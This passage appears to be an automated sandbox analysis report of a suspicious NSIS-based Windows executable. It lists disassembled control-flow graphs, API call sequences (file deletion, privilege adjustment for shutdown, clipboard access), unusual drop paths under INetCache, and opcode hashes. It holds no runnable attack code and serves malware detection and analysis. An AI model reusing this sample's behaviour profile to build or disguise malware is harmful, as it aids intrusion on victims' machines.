                                • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002D8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                              • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040362E
                              • ExitProcess.KERNEL32 ref: 0040364F
                              • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040376C
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403773
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378B
                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AA
                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004037CE
                              • ExitProcess.KERNEL32 ref: 004037F1
                                • Part of subcall function 004057B5: MessageBoxIndirectA.USER32(0040A230), ref: 00405810
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: HandleProcess$ExitFile$CloseEnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                              • String ID: "$"C:\Users\user\Desktop\1ppvR5VRT6.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\1ppvR5VRT6.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                              • API String ID: 3704715180-1020491676
                              • Opcode ID: 6fb2701c2198554de983d489162d70f6248e26c12371a32bdff927a978f2d77a
                              • Instruction ID: 629f98fd345f67a1e75e2db33264847053f345a98c6a7e8b50a39e9081f0102f
                              • Opcode Fuzzy Hash: 6fb2701c2198554de983d489162d70f6248e26c12371a32bdff927a978f2d77a
                              • Instruction Fuzzy Hash: 46C1E6702047506AD721AF759D89A2F3EACAB81706F45443FF581B61E2CB7C8A158B2F

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 134 4052fe-40531a 135 405320-4053e7 GetDlgItem * 3 call 40418f call 404a5e GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4054a9-4054af 134->136 158 405405-405408 135->158 159 4053e9-405403 SendMessageA * 2 135->159 138 4054b1-4054d3 GetDlgItem CreateThread FindCloseChangeNotification 136->138 139 4054d9-4054e5 136->139 138->139 141 405507-40550d 139->141 142 4054e7-4054ed 139->142 143 405562-405565 141->143 144 40550f-405515 141->144 146 405528-40552f call 4041c1 142->146 147 4054ef-405502 ShowWindow * 2 call 40418f 142->147 143->146 152 405567-40556d 143->152 148 405517-405523 call 404133 144->148 149 40553b-40554b ShowWindow 144->149 155 405534-405538 146->155 147->141 148->146 156 40555b-40555d call 404133 149->156 157 40554d-405556 call 4051c0 149->157 152->146 160 40556f-405582 SendMessageA 152->160 156->143 157->156 163 405418-40542f call 40415a 158->163 164 40540a-405416 SendMessageA 158->164 159->158 165 405588-4055b4 CreatePopupMenu call 4060bb AppendMenuA 160->165 166 40567f-405681 160->166 173 405431-405445 ShowWindow 163->173 174 405465-405486 GetDlgItem SendMessageA 163->174 164->163 171 4055b6-4055c6 GetWindowRect 165->171 172 4055c9-4055df TrackPopupMenu 165->172 166->155 171->172 172->166 175 4055e5-4055ff 172->175 176 405454 173->176 177 405447-405452 ShowWindow 173->177 174->166 178 40548c-4054a4 SendMessageA * 2 174->178 179 405604-40561f SendMessageA 175->179 180 40545a-405460 call 40418f 176->180 177->180 178->166 179->179 181 405621-405641 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405643-405663 SendMessageA 181->183 183->183 184 405665-405679 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->166
                              APIs
                              • GetDlgItem.USER32(?,00000403), ref: 0040535D
                              • GetDlgItem.USER32(?,000003EE), ref: 0040536C
                              • GetClientRect.USER32(?,?), ref: 004053A9
                              • GetSystemMetrics.USER32(00000002), ref: 004053B0
                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053D1
                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004053E2
                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 004053F5
                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405403
                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405416
                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405438
                              • ShowWindow.USER32(?,00000008), ref: 0040544C
                              • GetDlgItem.USER32(?,000003EC), ref: 0040546D
                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040547D
                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405496
                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054A2
                              • GetDlgItem.USER32(?,000003F8), ref: 0040537B
                                • Part of subcall function 0040418F: SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                              • GetDlgItem.USER32(?,000003EC), ref: 004054BE
                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005292,00000000), ref: 004054CC
                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054D3
                              • ShowWindow.USER32(00000000), ref: 004054F6
                              • ShowWindow.USER32(?,00000008), ref: 004054FD
                              • ShowWindow.USER32(00000008), ref: 00405543
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405577
                              • CreatePopupMenu.USER32 ref: 00405588
                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040559D
                              • GetWindowRect.USER32(?,000000FF), ref: 004055BD
                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055D6
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405612
                              • OpenClipboard.USER32(00000000), ref: 00405622
                              • EmptyClipboard.USER32 ref: 00405628
                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405631
                              • GlobalLock.KERNEL32(00000000), ref: 0040563B
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564F
                              • GlobalUnlock.KERNEL32(00000000), ref: 00405668
                              • SetClipboardData.USER32(00000001,00000000), ref: 00405673
                              • CloseClipboard.USER32 ref: 00405679
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                              • String ID: 0B
                              • API String ID: 4154960007-4132856435
                              • Opcode ID: 4ae86a2eb0e764239c625fe7474c6516e4a04bb5ce475004cf9a6bce91262fda
                              • Instruction ID: 65bb4f05285cabcaf0c1ceede2bf8135bd939e85a5c998f60940a67221f6d910
                              • Opcode Fuzzy Hash: 4ae86a2eb0e764239c625fe7474c6516e4a04bb5ce475004cf9a6bce91262fda
                              • Instruction Fuzzy Hash: A8A17A71900208BFDB119FA0DE89EAE7F79FB08355F00403AFA55BA1A0CB754E519F68

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 497 405861-405887 call 405b1f 500 4058a0-4058a7 497->500 501 405889-40589b DeleteFileA 497->501 503 4058a9-4058ab 500->503 504 4058ba-4058ca call 406099 500->504 502 405a2a-405a2e 501->502 505 4058b1-4058b4 503->505 506 4059d8-4059dd 503->506 510 4058d9-4058da call 405a78 504->510 511 4058cc-4058d7 lstrcatA 504->511 505->504 505->506 506->502 509 4059df-4059e2 506->509 512 4059e4-4059ea 509->512 513 4059ec-4059f4 call 40639c 509->513 514 4058df-4058e2 510->514 511->514 512->502 513->502 520 4059f6-405a0a call 405a31 call 405819 513->520 518 4058e4-4058eb 514->518 519 4058ed-4058f3 lstrcatA 514->519 518->519 521 4058f8-405916 lstrlenA FindFirstFileA 518->521 519->521 535 405a22-405a25 call 4051c0 520->535 536 405a0c-405a0f 520->536 523 40591c-405933 call 405a5c 521->523 524 4059ce-4059d2 521->524 531 405935-405939 523->531 532 40593e-405941 523->532 524->506 526 4059d4 524->526 526->506 531->532 537 40593b 531->537 533 405943-405948 532->533 534 405954-405962 call 406099 532->534 538 40594a-40594c 533->538 539 4059ad-4059bf FindNextFileA 533->539 547 405964-40596c 534->547 548 405979-405984 call 405819 534->548 535->502 536->512 541 405a11-405a20 call 4051c0 call 405e78 536->541 537->532 538->534 543 40594e-405952 538->543 539->523 545 4059c5-4059c8 FindClose 539->545 541->502 543->534 543->539 545->524 547->539 550 40596e-405977 call 405861 547->550 557 4059a5-4059a8 call 4051c0 548->557 558 405986-405989 548->558 550->539 557->539 560 40598b-40599b call 4051c0 call 405e78 558->560 561 40599d-4059a3 558->561 560->539 561->539
                              APIs
                              • DeleteFileA.KERNELBASE(?,?,75A33410,75A32EE0,00000000), ref: 0040588A
                              • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,75A33410,75A32EE0,00000000), ref: 004058D2
                              • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,75A33410,75A32EE0,00000000), ref: 004058F3
                              • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,75A33410,75A32EE0,00000000), ref: 004058F9
                              • FindFirstFileA.KERNELBASE(00421D38,?,?,?,0040A014,?,00421D38,?,?,75A33410,75A32EE0,00000000), ref: 0040590A
                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059B7
                              • FindClose.KERNEL32(00000000), ref: 004059C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: "C:\Users\user\Desktop\1ppvR5VRT6.exe"$\*.*
                              • API String ID: 2035342205-2680393972
                              • Opcode ID: 83b5a4a5d0d8edda3f8e0557dfde68d1d2535845567fb2c63194c6eb2875a849
                              • Instruction ID: 1dcfc4082d76b88a8dbc056b088e655b37054d2965a561fc4bca86fefb361094
                              • Opcode Fuzzy Hash: 83b5a4a5d0d8edda3f8e0557dfde68d1d2535845567fb2c63194c6eb2875a849
                              • Instruction Fuzzy Hash: 8C51AF71900A04EADB22AB258C85BBF7A78DF42724F14817BF851B51D2D73C4982DF6E
                              APIs
                              • CoCreateInstance.OLE32(00408408,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                              Strings
                              • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing, xrefs: 0040218D
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing
                              • API String ID: 123533781-3807799786
                              • Opcode ID: 1de0a6610444ccfce012cd9757aba54bd57a6ab52e750509d87dd78bfa4fca60
                              • Instruction ID: a4a7f3c5621d46c7608b395b9069b641d7403675325c7ae40bb0e4cab6624151
                              • Opcode Fuzzy Hash: 1de0a6610444ccfce012cd9757aba54bd57a6ab52e750509d87dd78bfa4fca60
                              • Instruction Fuzzy Hash: 89512475A00208BFCF10DFE4C988A9DBBB5EF88314F2045AAF915EB2D1DA799941CF54
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                              • Instruction ID: 4aa70ef1b53fe275c3baa8fcae8ec6f6e0a9bb882f540f469220498d10fac131
                              • Opcode Fuzzy Hash: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                              • Instruction Fuzzy Hash: E9F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D7785A9ACF44
                              APIs
                              • FindFirstFileA.KERNELBASE(75A33410,00422580,C:\,00405B62,C:\,C:\,00000000,C:\,C:\,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0), ref: 004063A7
                              • FindClose.KERNELBASE(00000000), ref: 004063B3
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID: C:\
                              • API String ID: 2295610775-3404278061
                              • Opcode ID: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                              • Instruction ID: 7ad18ffb452888df832aaad39da4d842c40e8f76539fb63f13b43eacc156c169
                              • Opcode Fuzzy Hash: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                              • Instruction Fuzzy Hash: 7CD012316050306BC20117386E0C84B7A5C9F053307119B37F9A6F12E0D7748CB286DD

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 185 403c86-403c98 186 403dd9-403de8 185->186 187 403c9e-403ca4 185->187 189 403e37-403e4c 186->189 190 403dea-403e32 GetDlgItem * 2 call 40415a SetClassLongA call 40140b 186->190 187->186 188 403caa-403cb3 187->188 193 403cb5-403cc2 SetWindowPos 188->193 194 403cc8-403ccb 188->194 191 403e8c-403e91 call 4041a6 189->191 192 403e4e-403e51 189->192 190->189 204 403e96-403eb1 191->204 196 403e53-403e5e call 401389 192->196 197 403e84-403e86 192->197 193->194 199 403ce5-403ceb 194->199 200 403ccd-403cdf ShowWindow 194->200 196->197 218 403e60-403e7f SendMessageA 196->218 197->191 203 404127 197->203 205 403d07-403d0a 199->205 206 403ced-403d02 DestroyWindow 199->206 200->199 213 404129-404130 203->213 211 403eb3-403eb5 call 40140b 204->211 212 403eba-403ec0 204->212 208 403d0c-403d18 SetWindowLongA 205->208 209 403d1d-403d23 205->209 214 404104-40410a 206->214 208->213 216 403dc6-403dd4 call 4041c1 209->216 217 403d29-403d3a GetDlgItem 209->217 211->212 221 4040e5-4040fe DestroyWindow EndDialog 212->221 222 403ec6-403ed1 212->222 214->203 220 40410c-404112 214->220 216->213 223 403d59-403d5c 217->223 224 403d3c-403d53 SendMessageA IsWindowEnabled 217->224 218->213 220->203 226 404114-40411d ShowWindow 220->226 221->214 222->221 227 403ed7-403f24 call 4060bb call 40415a * 3 GetDlgItem 222->227 228 403d61-403d64 223->228 229 403d5e-403d5f 223->229 224->203 224->223 226->203 255 403f26-403f2b 227->255 256 403f2e-403f6a ShowWindow KiUserCallbackDispatcher call 40417c EnableWindow 227->256 234 403d72-403d77 228->234 235 403d66-403d6c 228->235 233 403d8f-403d94 call 404133 229->233 233->216 238 403dad-403dc0 SendMessageA 234->238 240 403d79-403d7f 234->240 235->238 239 403d6e-403d70 235->239 238->216 239->233 243 403d81-403d87 call 40140b 240->243 244 403d96-403d9f call 40140b 240->244 253 403d8d 243->253 244->216 252 403da1-403dab 244->252 252->253 253->233 255->256 259 403f6c-403f6d 256->259 260 403f6f 256->260 261 403f71-403f9f GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403fa1-403fb2 SendMessageA 261->262 263 403fb4 261->263 264 403fba-403ff4 call 40418f call 403c67 call 406099 lstrlenA call 4060bb SetWindowTextA call 401389 262->264 263->264 264->204 275 403ffa-403ffc 264->275 275->204 276 404002-404006 275->276 277 404025-404039 DestroyWindow 276->277 278 404008-40400e 276->278 277->214 279 40403f-40406c CreateDialogParamA 277->279 278->203 280 404014-40401a 278->280 279->214 281 404072-4040c9 call 40415a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->204 282 404020 280->282 281->203 287 4040cb-4040de ShowWindow call 4041a6 281->287 282->203 289 4040e3 287->289 289->214
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC2
                              • ShowWindow.USER32(?), ref: 00403CDF
                              • DestroyWindow.USER32 ref: 00403CF3
                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0F
                              • GetDlgItem.USER32(?,?), ref: 00403D30
                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D44
                              • IsWindowEnabled.USER32(00000000), ref: 00403D4B
                              • GetDlgItem.USER32(?,00000001), ref: 00403DF9
                              • GetDlgItem.USER32(?,00000002), ref: 00403E03
                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403E1D
                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6E
                              • GetDlgItem.USER32(?,00000003), ref: 00403F14
                              • ShowWindow.USER32(00000000,?), ref: 00403F35
                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F47
                              • EnableWindow.USER32(?,?), ref: 00403F62
                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F78
                              • EnableMenuItem.USER32(00000000), ref: 00403F7F
                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F97
                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FAA
                              • lstrlenA.KERNEL32(symphonized: Installing,?,symphonized: Installing,00000000), ref: 00403FD4
                              • SetWindowTextA.USER32(?,symphonized: Installing), ref: 00403FE3
                              • ShowWindow.USER32(?,0000000A), ref: 00404117
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                              • String ID: symphonized: Installing
                              • API String ID: 3282139019-1948955388
                              • Opcode ID: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
                              • Instruction ID: afa02c3f8619f32611db6353159f3c7bef7a20c9a9555f4ee95b1447c660ea49
                              • Opcode Fuzzy Hash: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
                              • Instruction Fuzzy Hash: 6FC11271600201FBDB206F61EE89D2B3AB8FB94306F51053EF661B51F0CB7998829B1D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 290 4038e9-403901 call 406431 293 403903-403913 call 405ff7 290->293 294 403915-403946 call 405f80 290->294 303 403969-403992 call 403bae call 405b1f 293->303 299 403948-403959 call 405f80 294->299 300 40395e-403964 lstrcatA 294->300 299->300 300->303 308 403998-40399d 303->308 309 403a19-403a21 call 405b1f 303->309 308->309 310 40399f-4039c3 call 405f80 308->310 315 403a23-403a2a call 4060bb 309->315 316 403a2f-403a54 LoadImageA 309->316 310->309 317 4039c5-4039c7 310->317 315->316 319 403ad5-403add call 40140b 316->319 320 403a56-403a86 RegisterClassA 316->320 321 4039d8-4039e4 lstrlenA 317->321 322 4039c9-4039d6 call 405a5c 317->322 333 403ae7-403af2 call 403bae 319->333 334 403adf-403ae2 319->334 323 403ba4 320->323 324 403a8c-403ad0 SystemParametersInfoA CreateWindowExA 320->324 328 4039e6-4039f4 lstrcmpiA 321->328 329 403a0c-403a14 call 405a31 call 406099 321->329 322->321 327 403ba6-403bad 323->327 324->319 328->329 332 4039f6-403a00 GetFileAttributesA 328->332 329->309 336 403a02-403a04 332->336 337 403a06-403a07 call 405a78 332->337 343 403af8-403b12 ShowWindow call 4063c3 333->343 344 403b7b-403b7c call 405292 333->344 334->327 336->329 336->337 337->329 349 403b14-403b19 call 4063c3 343->349 350 403b1e-403b30 GetClassInfoA 343->350 348 403b81-403b83 344->348 351 403b85-403b8b 348->351 352 403b9d-403b9f call 40140b 348->352 349->350 356 403b32-403b42 GetClassInfoA RegisterClassA 350->356 357 403b48-403b6b DialogBoxParamA call 40140b 350->357 351->334 353 403b91-403b98 call 40140b 351->353 352->323 353->334 356->357 361 